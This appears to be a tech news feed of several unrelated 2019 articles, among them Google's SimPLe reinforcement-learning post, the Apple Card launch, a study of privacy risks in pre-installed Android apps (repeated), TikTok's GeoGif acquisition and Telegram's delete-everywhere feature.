25 March 2019

Simulated Policy Learning in Video Models




Deep reinforcement learning (RL) techniques can be used to learn policies for complex tasks from visual inputs, and have been applied with great success to classic Atari 2600 games. Recent work in this field has shown that it is possible to get super-human performance in many of them, even in challenging exploration regimes such as that exhibited by Montezuma's Revenge. However, one of the limitations of many state-of-the-art approaches is that they require a very large number of interactions with the game environment, often much larger than what people would need to learn to play well. One plausible hypothesis explaining why people learn these tasks so much more efficiently is that they are able to predict the effect of their own actions, and thus implicitly learn a model of which action sequences will lead to desirable outcomes. This general idea—building a so-called model of the game and using it to learn a good policy for selecting actions—is the main premise of model-based reinforcement learning (MBRL).

In "Model-Based Reinforcement Learning for Atari", we introduce the Simulated Policy Learning (SimPLe) algorithm, an MBRL framework to train agents for Atari gameplay that is significantly more efficient than current state-of-the-art techniques, and shows competitive results using only ~100K interactions with the game environment (equivalent to roughly two hours of real-time play by a person). In addition, we have open sourced our code as part of the tensor2tensor open source library. The release contains a pretrained world model that can be run with a simple command line and that can be played using an Atari-like interface.

Learning a SimPLe World Model
At a high-level, the idea behind SimPLe is to alternate between learning a world model of how the game behaves and using that model to optimize a policy (with model-free reinforcement learning) within the simulated game environment. The basic principles behind this algorithm are well established and have been employed in numerous recent model-based reinforcement learning methods.
Main loop of SimPLe. 1) The agent starts interacting with the real environment. 2) The collected observations are used to update the current world model. 3) The agent updates the policy by learning inside the world model.
To train an Atari game playing model we first need to generate plausible versions of the future in pixel space. In other words, we seek to predict what the next frame will look like, by taking as input a sequence of already observed frames and the commands given to the game, such as "left", "right", etc. One of the important reasons for training a world model in observation space is that it is, in effect, a form of self-supervision, where the observations—pixels, in our case—form a dense and rich supervision signal.

If successful in training such a model (e.g. a video predictor), one essentially has a learned simulator of the game environment that can be used to generate trajectories for training a good policy for a gaming agent, i.e. choosing a sequence of actions such that long-term reward of the agent is maximized. In other words, instead of having the policy be trained on sequences from the real game, which is prohibitively intensive in both time and computation, we train the policy on sequences coming from the world model / learned simulator.

Our world model is a feedforward convolutional network that takes in four frames and predicts the next frame as well as the reward (see figure above). However, in the case of Atari, the future is non-deterministic given only a horizon of the previous four frames. For example, a pause in the game longer than four frames, such as when the ball falls out of the frame in Pong, can lead to a failure of the model to predict subsequent frames successfully. We handle stochasticity problems such as these with a new video model architecture that does much better in this setting, inspired by previous work.
One example of an issue arising from stochasticity is seen when the SimPle model is applied to Kung Fu Master. In the animation, the left is the output of the model, the middle is the groundtruth, and the right panel is the pixel-wise difference between the two. Here the model's predictions deviate from the real game by spawning a different number of opponents.
At each iteration, after the world model is trained, we use this learned simulator to generate rollouts (i.e. sample sequences of actions, observations and outcomes) that are used to improve the game playing policy using the Proximal Policy Optimization (PPO) algorithm. One important detail for making SimPLe work is that the sampling of rollouts starts from the real dataset frames. Because prediction errors typically compound over time and make long-term predictions very difficult, SimPLe only uses medium-length rollouts. Luckily, the PPO algorithm can learn long-term effects between actions and rewards from its internal value function too, so rollouts of limited length are sufficient even for games with sparse rewards like Freeway.

SimPLe Efficiency
One measure of success is to demonstrate that the model is highly efficient. For this, we evaluated the output of our policies after 100K interactions with the environment, which corresponds to roughly two hours of real-time game play by a person. We compare our SimPLe method with two state of the art model-free RL methods, Rainbow and PPO, applied to 26 different games. In most cases, the SimPLe approach has a sample efficiency more than 2x better than the other methods.
The number of interactions needed by the respective model-free algorithms (left - Rainbow; right - PPO) to match the score achieved using our SimPLe training method. The red line indicates the number of interactions used by our method.
SimPLe Success
An exciting result of the SimPLe approach is that for two of the games, Pong and Freeway, an agent trained in the simulated environment is able to achieve the maximum score. Here is a video of our agent playing the game using the game model that we learned for Pong:
For Freeway, Pong and Breakout, SimPLe can generate nearly pixel-perfect predictions up to 50 steps into the future, as shown below.
Nearly pixel perfect predictions can be made by SimPLe, on Breakout (top) and Freeway (bottom). In each animation, the left is the output of the model, the middle is the groundtruth, and the right pane is the pixel-wise difference between the two.
SimPLe Surprises
SimPLe does not always make correct predictions, however. The most common failure is due to the world model not accurately capturing or predicting small but highly relevant objects. Some examples are: (1) in Atlantis and Battlezone bullets are so small that they tend to disappear, and (2) Private Eye, in which the agent traverses different scenes, teleporting from one to the other. We found that our model generally struggled to capture such large global changes.
In Battlezone, we find the model struggles with predicting small, relevant parts, such as the bullet.
Conclusion
The main promise of model-based reinforcement learning methods is in environments where interactions are either costly, slow or require human labeling, such as many robotics tasks. In such environments, a learned simulator would enable a better understanding of the agent's environment and could lead to new, better and faster ways for doing multi-task reinforcement learning. While SimPLe does not yet match the performance of standard model-free RL methods, it is substantially more efficient, and we expect future work to further improve the performance of model-based techniques.

If you'd like to develop your own models and experiments, head to our repository and colab where you'll find instructions on how to reproduce our work along with pre-trained world models.

Acknowledgements
This work was done in collaboration with the University of Illinois at Urbana-Champaign, the University of Warsaw and deepsense.ai. We would like to give special recognition to paper co-authors Mohammad Babaeizadeh, Piotr Miłos, Błażej Osiński, Roy H Campbell, Konrad Czechowski, Chelsea Finn, Piotr Kozakowski, Sergey Levine, Ryan Sepassi, George Tucker and Henryk Michalewski.

Apple introduces its own credit card, the Apple Card


Today, Apple announced… a credit card. The Apple Card is designed for the iPhone and will work with the Wallet app. You sign up from your iPhone and you can use it with Apple Pay in just a few minutes.

Before introducing the card, Apple CEO Tim Cook shared a few numbers about Apple Pay. This year, Apple Pay will reach 10 billion transactions this year. By the end of this year, Apple Pay will be available in more than 40 countries.

Retail acceptance of Apple Pay is always growing. In the U.S., 70 percent of businesses accept Apple Pay. But it’s higher in some countries — Australia is at 99 percent acceptance for instance.

But let’s talk about the Apple Card. After signing up, you control the Apple Card from the Wallet app. When you tap on the card, you can see your last transactions, how much you owe, how much money you spent on each category.

You can tap on a transaction and see the location in a tiny Apple Maps view. Every time you make an Apple Pay transaction, you get 2 percent in cash back. You don’t have to wait until the end of the month as your cash is credited every day. For Apple purchases, you get 3 percent back.

As previously rumored, Apple has partnered with Goldman Sachs and Mastercard to issue that card. Apple doesn’t know what you bought, where you bought it and how much you paid for it. And Goldman Sachs promises that it won’t sell your data for advertising or marketing.

When it comes to the fine prints, there’s no late fees, no annual fees, no international fees and no over-limit fees. If you can’t pay back your credit card balance, you can start a multi-month plan — Apple tries to clearly define the terms of the plan. You can contact customer support through text messages in the Messages app.

The Apple Card isn’t limited to a virtual card. You get a physical titanium card with a laser-etched name. There’s no card number, no CVV code, no expiration date and no signature on the card. You have to use the Wallet app to get that information. Physical transactions are eligible to 1 percent in daily cash.

When it comes to security, you’ll get a different credit card number for each of your device. It is stored securely and you can access the PIN code using Face ID or your fingerprint.

The card will be available this summer for customers in the U.S.


Read Full Article

Android users’ security and privacy at risk from shadowy ecosystem of pre-installed software, study warns


A large-scale independent study of pre-installed Android apps has cast a critical spotlight on the privacy and security risks that preloaded software poses to users of the Google developed mobile platform.

The researchers behind the paper, which has been published in preliminary form ahead of a future presentation at the IEEE Symposium on Security and Privacy, unearthed a complex ecosystem of players with a primary focus on advertising and “data-driven services” — which they argue the average Android user is unlikely to be unaware of (while also likely lacking the ability to uninstall/evade the baked in software’s privileged access to data and resources themselves).

The study, which was carried out by researchers at the Universidad Carlos III de Madrid (UC3M) and the IMDEA Networks Institute, in collaboration with the International Computer Science Institute (ICSI) at Berkeley (USA) and Stony Brook University of New York (US), encompassed more than 82,000 pre-installed Android apps across more than 1,700 devices manufactured by 214 brands, according to the IMDEA institute.

“The study shows, on the one hand, that the permission model on the Android operating system and its apps allow a large number of actors to track and obtain personal user information,” it writes. “At the same time, it reveals that the end user is not aware of these actors in the Android terminals or of the implications that this practice could have on their privacy.  Furthermore, the presence of this privileged software in the system makes it difficult to eliminate it if one is not an expert user.”

An example of a well-known app that can come pre-installed on certain Android devices is Facebook.

Earlier this year the social network giant was revealed to have inked an unknown number of agreements with device makers to preload its app. And while the company has claimed these pre-installs are just placeholders — unless or until a user chooses to actively engage with and download the Facebook app, Android users essentially have to take those claims on trust with no ability to verify the company’s claims (short of finding a friendly security researcher to conduct a traffic analysis) nor remove the app from their device themselves. Facebook pre-loads can only be disabled, not deleted entirely.

The company’s preloads also sometimes include a handful of other Facebook-branded system apps which are even less visible on the device and whose function is even more opaque.

Facebook previously confirmed to TechCrunch there’s no ability for Android users to delete any of its preloaded Facebook system apps either.

Facebook uses Android system apps to ensure people have the best possible user experience including reliably receiving notifications and having the latest version of our apps. These system apps only support the Facebook family of apps and products, are designed to be off by default until a person starts using a Facebook app, and can always be disabled,” a Facebook spokesperson told us earlier this month.

But the social network is just one of scores of companies involved in a sprawling, opaque and seemingly interlinked data gathering and trading ecosystem that Android supports and which the researchers set out to shine a light into.

In all 1,200 developers were identified behind the pre-installed software they found in the data-set they examined, as well as more than 11,000 third party libraries (SDKs). Many of the preloaded apps were found to display what the researchers dub potentially dangerous or undesired behavior.

The data-set underpinning their analysis was collected via crowd-sourcing methods — using a purpose-built app (called Firmware Scanner), and pulling data from the Lumen Privacy Monitor app. The latter provided the researchers with visibility on mobile traffic flow — via anonymized network flow metadata obtained from its users. 

They also crawled the Google Play Store to compare their findings on pre-installed apps with publicly available apps — and found that just 9% of the package names in their dataset were publicly indexed on Play. 

Another concerning finding relates to permissions. In addition to standard permissions defined in Android (i.e. which can be controlled by the user) the researchers say they identified more than 4,845 owner or “personalized” permissions by different actors in the manufacture and distribution of devices.

So that means they found systematic user permissions workarounds being enabled by scores of commercial deals cut in a non-transparency data-driven background Android software ecosystem.

“This type of permission allows the apps advertised on Google Play to evade Android’s permission model to access user data without requiring their consent upon installation of a new app,” writes the IMDEA.

The top-line conclusion of the study is that the supply chain around Android’s open source model is characterized by a lack of transparency — which in turn has enabled an ecosystem to grow unchecked and get established that’s rife with potentially harmful behaviors and even backdoored access to sensitive data, all without most Android users’ consent or awareness. (On the latter front the researchers carried out a small-scale survey of consent forms of some Android phones to examine user awareness.)

tl;dr the phrase ‘if it’s free you’re the product’ is a too trite cherry atop a staggeringly large yet entirely submerged data-gobbling iceberg. (Not least because Android smartphones don’t tend to be entirely free.)

“Potential partnerships and deals — made behind closed doors between stakeholders — may have made user data a commodity before users purchase their devices or decide to install software of their own,” the researchers warn. “Unfortunately, due to a lack of central authority or trust system to allow verification and attribution of the self-signed certificates that are used to sign apps, and due to a lack of any mechanism to identify the purpose and legitimacy of many of these apps and custom permissions, it is difficult to attribute unwanted and harmful app behaviors to the party or parties responsible. This has broader negative implications for accountability and liability in this ecosystem as a whole.”

The researchers go on to make a series of recommendations intended to address the lack of transparency and accountability in the Android ecosystem — including suggesting the introduction and use of certificates signed by globally-trusted certificate authorities, or a certificate transparency repository “dedicated to providing details and attribution for certificates used to sign various Android apps, including pre-installed apps, even if self-signed”.

They also suggest Android devices should be required to document all pre-installed apps, plus their purpose, and name the entity responsible for each piece of software — and do so in a manner that is “accessible and understandable to users”.

“[Android] users are not clearly informed about third-party software that is installed on their devices, including third-party tracking and advertising services embedded in many pre-installed apps, the types of data they collect from them, the capabilities and the amount of control they have on their devices, and the partnerships that allow information to be shared and control to be given to various other companies through custom permissions, backdoors, and side-channels. This necessitates a new form of privacy policy suitable for preinstalled apps to be defined and enforced to ensure that private information is at least communicated to the user in a clear and accessible way, accompanied by mechanisms to enable users to make informed decisions about how or whether to use such devices without having to root their devices,” they argue, calling for overhaul of what’s long been a moribund T&Cs system, from a consumer rights point of view.

In conclusion they couch the study as merely scratching the surface of “a much larger problem”, saying their hope for the work is to bring more attention to the pre-installed Android software ecosystem and encourage more critical examination of its impact on users’ privacy and security.

They also write that they intend to continue to work on improving the tools used to gather the data-set, as well as saying their plan is to “gradually” make the data-set itself available to the research community and regulators to encourage others to dive in.  


Read Full Article

Android users’ security and privacy at risk from shadowy ecosystem of pre-installed software, study warns


A large-scale independent study of pre-installed Android apps has cast a critical spotlight on the privacy and security risks that preloaded software poses to users of the Google developed mobile platform.

The researchers behind the paper, which has been published in preliminary form ahead of a future presentation at the IEEE Symposium on Security and Privacy, unearthed a complex ecosystem of players with a primary focus on advertising and “data-driven services” — which they argue the average Android user is unlikely to be unaware of (while also likely lacking the ability to uninstall/evade the baked in software’s privileged access to data and resources themselves).

The study, which was carried out by researchers at the Universidad Carlos III de Madrid (UC3M) and the IMDEA Networks Institute, in collaboration with the International Computer Science Institute (ICSI) at Berkeley (USA) and Stony Brook University of New York (US), encompassed more than 82,000 pre-installed Android apps across more than 1,700 devices manufactured by 214 brands, according to the IMDEA institute.

“The study shows, on the one hand, that the permission model on the Android operating system and its apps allow a large number of actors to track and obtain personal user information,” it writes. “At the same time, it reveals that the end user is not aware of these actors in the Android terminals or of the implications that this practice could have on their privacy.  Furthermore, the presence of this privileged software in the system makes it difficult to eliminate it if one is not an expert user.”

An example of a well-known app that can come pre-installed on certain Android devices is Facebook.

Earlier this year the social network giant was revealed to have inked an unknown number of agreements with device makers to preload its app. And while the company has claimed these pre-installs are just placeholders — unless or until a user chooses to actively engage with and download the Facebook app, Android users essentially have to take those claims on trust with no ability to verify the company’s claims (short of finding a friendly security researcher to conduct a traffic analysis) nor remove the app from their device themselves. Facebook pre-loads can only be disabled, not deleted entirely.

The company’s preloads also sometimes include a handful of other Facebook-branded system apps which are even less visible on the device and whose function is even more opaque.

Facebook previously confirmed to TechCrunch there’s no ability for Android users to delete any of its preloaded Facebook system apps either.

Facebook uses Android system apps to ensure people have the best possible user experience including reliably receiving notifications and having the latest version of our apps. These system apps only support the Facebook family of apps and products, are designed to be off by default until a person starts using a Facebook app, and can always be disabled,” a Facebook spokesperson told us earlier this month.

But the social network is just one of scores of companies involved in a sprawling, opaque and seemingly interlinked data gathering and trading ecosystem that Android supports and which the researchers set out to shine a light into.

In all 1,200 developers were identified behind the pre-installed software they found in the data-set they examined, as well as more than 11,000 third party libraries (SDKs). Many of the preloaded apps were found to display what the researchers dub potentially dangerous or undesired behavior.

The data-set underpinning their analysis was collected via crowd-sourcing methods — using a purpose-built app (called Firmware Scanner), and pulling data from the Lumen Privacy Monitor app. The latter provided the researchers with visibility on mobile traffic flow — via anonymized network flow metadata obtained from its users. 

They also crawled the Google Play Store to compare their findings on pre-installed apps with publicly available apps — and found that just 9% of the package names in their dataset were publicly indexed on Play. 

Another concerning finding relates to permissions. In addition to standard permissions defined in Android (i.e. which can be controlled by the user) the researchers say they identified more than 4,845 owner or “personalized” permissions by different actors in the manufacture and distribution of devices.

So that means they found systematic user permissions workarounds being enabled by scores of commercial deals cut in a non-transparency data-driven background Android software ecosystem.

“This type of permission allows the apps advertised on Google Play to evade Android’s permission model to access user data without requiring their consent upon installation of a new app,” writes the IMDEA.

The top-line conclusion of the study is that the supply chain around Android’s open source model is characterized by a lack of transparency — which in turn has enabled an ecosystem to grow unchecked and get established that’s rife with potentially harmful behaviors and even backdoored access to sensitive data, all without most Android users’ consent or awareness. (On the latter front the researchers carried out a small-scale survey of consent forms of some Android phones to examine user awareness.)

tl;dr the phrase ‘if it’s free you’re the product’ is a too trite cherry atop a staggeringly large yet entirely submerged data-gobbling iceberg. (Not least because Android smartphones don’t tend to be entirely free.)

“Potential partnerships and deals — made behind closed doors between stakeholders — may have made user data a commodity before users purchase their devices or decide to install software of their own,” the researchers warn. “Unfortunately, due to a lack of central authority or trust system to allow verification and attribution of the self-signed certificates that are used to sign apps, and due to a lack of any mechanism to identify the purpose and legitimacy of many of these apps and custom permissions, it is difficult to attribute unwanted and harmful app behaviors to the party or parties responsible. This has broader negative implications for accountability and liability in this ecosystem as a whole.”

The researchers go on to make a series of recommendations intended to address the lack of transparency and accountability in the Android ecosystem — including suggesting the introduction and use of certificates signed by globally-trusted certificate authorities, or a certificate transparency repository “dedicated to providing details and attribution for certificates used to sign various Android apps, including pre-installed apps, even if self-signed”.

They also suggest Android devices should be required to document all pre-installed apps, plus their purpose, and name the entity responsible for each piece of software — and do so in a manner that is “accessible and understandable to users”.

“[Android] users are not clearly informed about third-party software that is installed on their devices, including third-party tracking and advertising services embedded in many pre-installed apps, the types of data they collect from them, the capabilities and the amount of control they have on their devices, and the partnerships that allow information to be shared and control to be given to various other companies through custom permissions, backdoors, and side-channels. This necessitates a new form of privacy policy suitable for preinstalled apps to be defined and enforced to ensure that private information is at least communicated to the user in a clear and accessible way, accompanied by mechanisms to enable users to make informed decisions about how or whether to use such devices without having to root their devices,” they argue, calling for overhaul of what’s long been a moribund T&Cs system, from a consumer rights point of view.

In conclusion they couch the study as merely scratching the surface of “a much larger problem”, saying their hope for the work is to bring more attention to the pre-installed Android software ecosystem and encourage more critical examination of its impact on users’ privacy and security.

They also write that they intend to continue to work on improving the tools used to gather the data-set, as well as saying their plan is to “gradually” make the data-set itself available to the research community and regulators to encourage others to dive in.  


Read Full Article

Where did social media go wrong?


For most of my life, the internet, particularly its social media — BBSes, Usenet, LiveJournal, blogosphere, even Myspace, early Twitter and Facebook — consistently made people happier. But roughly five years ago it began to consistently make people more miserable. What changed?

I posted that question to Twitter a week ago, and the most notable response was the response that did not exist: not a single person disputed the premise of the question. Yes, Twitter responses are obviously selection bias incarnate — but looking at the opprobrium aimed at social media from all sides today, I’d think that if anything it understates the current collective wisdom. Which of course can often be disjointed from factual reality … but still important. So, again: what changed?

Some argued that new, bad users flooded the internet then, a kind of ultimate Eternal September effect. I’m skeptical. Even five years ago Facebook was already ubiquitous in the West, and we were already constantly checking it on our smartphones. Others argue that it reflects happiness decreasing in society as a whole — but as far back as 2014? I remember that as, generally, a time of optimism, compared to today.

There was one really interesting response, from a stranger: “The nature of these social networks changed. They went from places where people debated to places where lonely people are trying to feel less lonely.” Relatedly, from a friend: “The algorithms were designed to make people spend more time on those sites. Interestingly, unhappy people spend more time on social sites. Is unhappiness the cause, or the result of algorithms surfacing content to make us unhappy?” That’s worth pondering.

Pretty much everyone else talked about money, basically buttressing the argument above. Modern social media algorithms drive engagement, because engagement drives advertising, and advertising drives profits, which are then used to hone the algorithms. It’s a perpetual motion engagement machine. Olden days social media, early Facebook and early Twitter, they had advertising, sure — but they didn’t have anything like today’s perpetual motion engagement.

Even that wouldn’t be so bad if it weren’t for the fact that there’s apparently a whole other perpetual motion machine at work in parallel, too: engagement drives unhappiness which drives engagement which drives unhappiness, because the kind of content which drives the most engagement apparently also drives anxiety and outrage — cf. Evan Williams’ notion that social media optimizes for car crashes — and arguably also, in the longer run, displace other activities, which do bring happiness and fulfillment.

I don’t want to sound like some sort of blood-and-thunder Luddite preacher. There’s nothing automatically wrong with maintaining a thriving existence on Facebook and Twitter, especially if you carefully prune your feeds such that they are asshole-free zones with minimal dogpiling and pointless outrage. (Some outrage is important. But most isn’t.) Social media has done a lot of excellent things, and still brings a lot of happiness to very many people.

But also, and increasingly, a lot of misery. Does it currently bring us net happiness? Five years ago I think that question would have seemed ridiculous to most: the answer would generally have been a quick yes-of-course. Nowadays, most would stop and wonder, and many would answer with an even faster hell-no. Five years ago, people who worked at Facebook (and to a lesser extent Twitter) were treated with respect and admiration by the rest of the tech industry. Nowadays, fairly or not, it’s something a lot more like disdain, and sometimes outright contempt.

The solution is obvious: change the algorithms. Which is to say: make less money. Ha.They could even remove the algorithms entirely, switch back to Strict Chronological, and still make money — Twitter was profitable before stock options before it switched to an algorithmic feed, and its ad offerings were way less sophisticated back then — but it’s not about making money, it’s about making the most money possible, and that means algorithmically curated, engagement-driven, misery-inducing feeds.

So: Social media is increasingly making us miserable. There’s an obvious solution, but financial realpolitik means we can’t get to it from here. So either we just accept this spreading misery as a normal, inescapable, fundamental part of our lives now — or some broader, more drastic solution is required. It’s a quandary.


Read Full Article

New Robot


New Robot

TikTok quietly picked up the assets of GeoGif, which created animated, location-specific overlays for video


Video sharing app TikTok passed 1 billion downloads last month, and its parent company ByteDance is ramping up its efforts to monetize those users with ads, while also continuing to add more features to the app to keep people engaged. In a move that could help both of those efforts, ByteDance has made a small acquisition, picking up the assets of a defunct startup called GeoGif, which developed location-specific, animated stickers and overlays for videos, suggested to users when they capture video or images in specific places.

It seems that the location-based, animated element of what GeoGif built is the key part of what might be coming soon to TikTok, since the app already had a range of visual and audio filters and stickers to alter appearances and your voice, or just to embellish and further personalize your video.

Here’s the general gist of what GeoGif can do for a video if you are, for example, in Miami for Spring Break. (Note: This is not the greatest example given the naff and objectifying subject matter, but it’s the only example the startup has provided.)

The terms of the acquisition have not been disclosed, although we are asking both Dean Glas, one of GeoGif’s co-founders, as well as ByteDance and we will update if we learn more. In any case, the deal appears to include only the assets of the startup, which ceased operating more than two years ago, judging by activity on its social media accounts and LinkedIn profiles. CEO Dean Glas and his co-founder Mendy Raskin are now both working on new startups.

“We are excited for GeoGif to have a new home at TikTok,” said GeoGif’s CEO Dean Glas, “and we believe our features will be enjoyed by millions of users. We will work closely to make sure it’s a smooth transition that provides a long-term positive impact for the TikTok community.”

A TikTok spokesperson also confirmed that the features that were built for GeoGif will get rolled into the main TikTok app: “GeoGif and TikTok share a common goal which is enabling people to connect, consume, and create great content. We’re impressed with what the team at GeoGif has built and with TikTok’s resources, we believe that we will deliver an even better user experience for our millions of users who love using TikTok to express their creativity through short videos.”

With TikTok, China’s ByteDance has created one of the world’s biggest video apps — and subsequently become one of the world’s most valuable startups — and it has used acquisition as a key lever for adding both users and features.

To help break into the US, the main app itself merged with Musical.ly last year after being acquired for between $800 million and $1 billion by Toutiao (a ByteDance sub-brand) in 2017. Other acquisitions have included Flipagram — another music-video app and startup — in 2017 for an undisclosed sum; the AR selfie camera FaceU in 2018, reportedly for $300 million; payments startup UIPay also in 2018; and — just last week — it appears ByteDance acquired a gaming startup, Mokun Technology, from previous owner 37 Interactive, also for an undisclosed sum.

It’s likely that the GeoGif acquisition was for a small sum: the company did not have anything close to mass-market traction, and it had raised only seed round of an undisclosed amount. It was originally spun out of parent company Bivid — which is also now defunct but had been a hyperlocal social network akin to YikYak, Highlight and Zenly, suggesting friends and others who were near to you for chit-chat and simply to know their whereabouts.

TikTok already runs ads and has other paid features in China, but in Western markets like the US, the company has largely only been doing limited runs and tests of different formats, such as this native video ad test we spotted in February.

In January, a leaked ad deck from the company in Europe also mentioned several advertising and marketing units it was running and planning to run including brand takeovers; in-feed native video; hashtag challenges; Snapchat-style 2D lens filters for photos; and 3D and AR lenses. It’s the latter of these where GeoGif’s efforts could be rolled in.

Also in January, Bloomberg reported that in 2018, ByteDance, for the first time, had failed to beat its own revenue forecasts: It had told investors when it was fundraising a monster $3 billion round that it expected to make between $7.4 billion and $8.1 billion in revenues for the year, and sources said it would be coming in at the lower end of that range.

These are, relatively speaking, huge numbers when you consider that ByteDance’s currency is social media apps, which often spend years making no money at all. But in the context of missing growth expectations, this slower expansion could be a lever for the company launching more ad formats in more places and launching more products, such as the Slack competitor it is also reportedly building.


Read Full Article

Google launches a new real-time data product for journalists


It’s been just over a year since Google announced its $300 million News Initiative, which included funding for independent journalism efforts along with products developed by Google.

One of those products was News Consumer Insights, which has been used by publishers like BuzzFeed, Business Insider and Conde Nast. It takes data already collected through Google Analytics and makes it more useful for publishers, particularly when it comes to understanding different audience segments and whether they’re likely to become paying subscribers.

“It’s turning raw data into business intelligence and actionable insights,” said Amy Adams Harding, Google’s head of analytics and revenue optimization and head of publisher development.

Now Google is building on the NCI product with a new tool called Real-time Content Insights.

As the name implies, RCI is focused on telling publishers what’s happening on their site at this moment, and on helping them identify trending news stories that could attract more readers. The initial NCI data is more useful for the publisher’s business or audience development teams, Harding said RCI is designed “to help the editorial side of our partners understand the dynamics of content on their site — what’s trending, what’s falling off, what’s getting traction.”

RCI - Screenshot

Real-time Content Insights

Google is hardly the first company to offer real-time data to news publishers, but Harding said this “off-the-shelf, click-to-play” product could be particularly useful for smaller newsrooms that don’t have a lot of resources and aren’t particularly data-savvy.

“Local is a huge pillar of the Google News Initiative,” Harding said. “What can we do to help develop tools where we can be support mechanisms for our partners as they try to stay sustainable during this transition … not only to digital, but one more transition over to this diversified revenue stream? That’s something that many of our publishers are not resourced well enough to take on on their own.”

RCI presents the data in the form of an image-heavy dashboard showing how many readers are looking at a story currently, and how many views the story’s gotten in the past 30 minutes. You can also see how well the site is doing today, compared to a normal day’s traffic, and break down your traffic by geography and referral sources.

The dashboard also shows the topics that are currently trending on Google and Twitter. Of course, not all of those topics will be right for your publication, but Harding said it can help editors and writers identify the gaps in their coverage, based on, “What are people curious about?” (on Google) and “What are people talking about?” (on Twitter).

At first glance, RCI doesn’t seem to tie directly into the bigger goals of helping publishers building sustainable, diversified business models. However, Harding that it can be used in conjunction with the existing NCI product, which helps them identify their most valuable audiences.

“Where the publisher would see value is, ‘Okay, we know that users coming from direct referral traffic are more valuable, [and] this article is driving is driving viewership from those types of readers,'” she said.

Harding added that Google is making the RCI source code available on GitHub, so that more sophisticated publishers can customize it to create their own data visualizations.


Read Full Article

Telegram adds ‘delete everywhere’ nuclear option — killing chat history


Telegram has added a feature that lets a user delete messages in one-to-one and/or group private chats, after the fact, and not only from their own inbox.

The new ‘nuclear option’ delete feature allows a user to selectively delete their own messages and/or messages sent by any/all others in the chat. They don’t even have to have composed the original message or begun the thread to do so. They can just decide it’s time.

Let that sink in.

All it now takes is a few taps to wipe all trace of a historical communication — from both your own inbox and the inbox(es) of whoever else you were chatting with (assuming they’re running the latest version of Telegram’s app).

Just over a year ago Facebook’s founder Mark Zuckerberg was criticized for silently and selectively testing a similar feature by deleting messages he’d sent from his interlocutors’ inboxes — leaving absurdly one-sided conversations. The episode was dubbed yet another Facebook breach of user trust.

Facebook later rolled out a much diluted Unsend feature — giving all users the ability to recall a message they’d sent but only within the first 10 minutes.

Telegram has gone much, much further. This is a perpetual, universal unsend of anything in a private chat.

The “delete any message in both ends in any private chat, anytime” feature has been added in an update to version 5.5 of Telegram — which the messaging app bills as offering “more privacy”, among a slate of other updates including search enhancements and more granular controls.

To delete a message from both ends a user taps on the message, selects ‘delete’ and then they’re offered a choice of ‘delete for [the name of the other person in the chat or for ‘everyone’] or ‘delete for me’. Selecting the former deletes the message everywhere, while the later just removes it from your own inbox.

Explaining the rational for adding such a nuclear option via a post to his public Telegram channel yesterday, founder Pavel Durov argues the feature is necessary because of the risk of old messages being taken out of context — suggesting the problem is getting worse as the volume of private data stored by chat partners continues to grow exponentially.

“Over the last 10-20 years, each of us exchanged millions of messages with thousands of people. Most of those communication logs are stored somewhere in other people’s inboxes, outside of our reach. Relationships start and end, but messaging histories with ex-friends and ex-colleagues remain available forever,” he writes.

“An old message you already forgot about can be taken out of context and used against you decades later. A hasty text you sent to a girlfriends in school can come haunt you in 2030 when you decide to run for mayor.”

Durov goes on to claim that the new wholesale delete gives users “complete control” over messages, regardless of who sent them.

However that’s not really what it does. More accurately it removes control from everyone in any private chat, and opens the door to the most paranoid; lowest common denominator; and/or a sort of general entropy/anarchy — allowing anyone in any private thread to choose to edit or even completely nuke the chat history if they so wish at any moment in time.

The feature could allow for self-servingly and selectively silent and/or malicious edits that are intended to gaslight/screw with others, such as by making them look mad or bad. (A quick screengrab later and a ‘post-truth’ version of a chat thread is ready for sharing elsewhere, where it could be passed off a genuine conversation even though it’s manipulated and therefore fake.)

Or else the motivation for editing chat history could be a genuine concern over privacy, such as to be able to remove sensitive or intimate stuff — say after a relationship breaks down.

Or just for kicks/the lolz between friends.

Either way, whoever deletes first seizes control of the chat history — taking control away from everyone else in the process. RIP consent. This is possible because Telegram’s implementation of the super delete feature covers all messages, not just your own, and literally removes all trace of the deleted comms.

So unlike rival messaging app WhatsApp, which also lets users delete a message for everyone in a chat after the fact of sending it (though in that case the delete everywhere feature is strictly limited to messages a person sent themselves), there is no notification automatically baked into the chat history to record that a message was deleted.

There’s no record, period. The ‘record’ is purged. There’s no sign at all there was ever a message in the first place.

We tested this — and, well, wow.

It’s hard to think of a good reason not to create at very least a record that a message was deleted which would offer a check on misuse.

But Telegram has not offered anything. Anyone can secretly and silently purge the private record.

Again, wow.

There’s also no way for a user to recall a deleted message after deleting it (even the person who hit the delete button). At face value it appears to be gone for good. (A security audit would be required to determine whether a copy lingers anywhere on Telegram’s servers for standard chats; only its ‘secret chats’ feature uses end-to-end encryption which it claims “leave no trace on our servers”.)

In our tests on iOS we also found that no notifications is sent when a message is deleted from a Telegram private chat so other people in an old convo might simply never notice changes have been made, or not until long after. After all human memory is far from perfect and old chat threads are exactly the sort of fast-flowing communication medium where it’s really easy to forget exact details of what was said.

Durov makes that point himself in defence of enabling the feature, arguing in favor of it so that silly stuff you once said can’t be dredged back up to haunt you.

But it cuts both ways. (The other way being the ability for the sender of an abusive message to delete it and pretend it never existed, for example, or for a flasher to send and subsequently delete dick pics.)

The feature is so powerful there’s clearly massive potential for abuse. Whether that’s by criminals using Telegram to sell drugs or traffic other stuff illegally, and hitting the delete everywhere button to cover their tracks and purge any record of their nefarious activity; or by coercive/abusive individuals seeking to screw with a former friend or partner.

The best way to think of Telegram now is that all private communications in the app are essentially ephemeral.

Anyone you’ve ever chatted to could decide to delete everything you said (or they said) and go ahead without your knowledge let alone your consent.

The lack of any notification that a message has been deleted will certainly open Telegram to accusations it’s being irresponsible by offering such a nuclear delete option with zero guard rails. (And, indeed, there’s no shortage of angry comments on its tweet announcing the feature.)

Though the company is no stranger to controversy and has structured its business intentionally to minimize the risk of it being subject to any kind of regulatory and/or state control, with servers spread opaquely all over the world, and a nomadic development operation which sees its coders regularly switch the country they’re working out of for months at a time.

Durov himself acknowledges there is a risk of misuse of the feature in his channel post, where he writes: “We know some people may get concerned about the potential misuse of this feature or about the permanence of their chat histories. We thought carefully through those issues, but we think the benefit of having control over your own digital footprint should be paramount.”

Again, though, that’s a one-sided interpretation of what’s actually being enabled here. Because the feature inherently removes control from anyone it’s applied to. So it only offers ‘control’ to the person who first thinks to exercise it. Which is in itself a form of massive power asymmetry.

For historical chats the person who deletes first might be someone with something bad to hide. Or it might be the most paranoid person with the best threat awareness and personal privacy hygiene.

But suggesting the feature universally hands control to everyone simply isn’t true.

